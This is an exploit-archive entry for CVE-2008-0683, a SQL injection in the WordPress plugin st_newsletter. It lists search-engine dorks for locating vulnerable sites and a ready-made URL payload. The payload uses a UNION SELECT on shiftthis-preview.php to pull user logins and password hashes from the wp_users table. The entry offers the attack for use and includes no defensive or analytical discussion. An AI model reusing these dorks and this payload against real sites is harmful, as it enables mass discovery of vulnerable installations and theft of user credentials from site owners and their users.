WordPress Plugin st_newsletter - SQL Injection

Author: S@BUN
type: webapps
platform: php
port: 
date_added: 2008-02-02 
date_updated:  
verified: 1 
codes: OSVDB-41511;CVE-2008-0683 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: 

#########################################################################
#
#  Wordpress Plugin (st_newsletter) SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
# DORKS 1 : allinurl :"wp-content/plugins/st_newsletter"
#
# DORK 2 : allinurl :"shiftthis-preview.php"
#
##########################################################################
EXPLOIT :

wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users


##########################################################################
# S@BUN                   www.hackturkiye.com                  S@BUN
##########################################################################
# S@BUN                      GOOD LUCKY                          S@BUN
##########################################################################

# milw0rm.com [2008-02-03]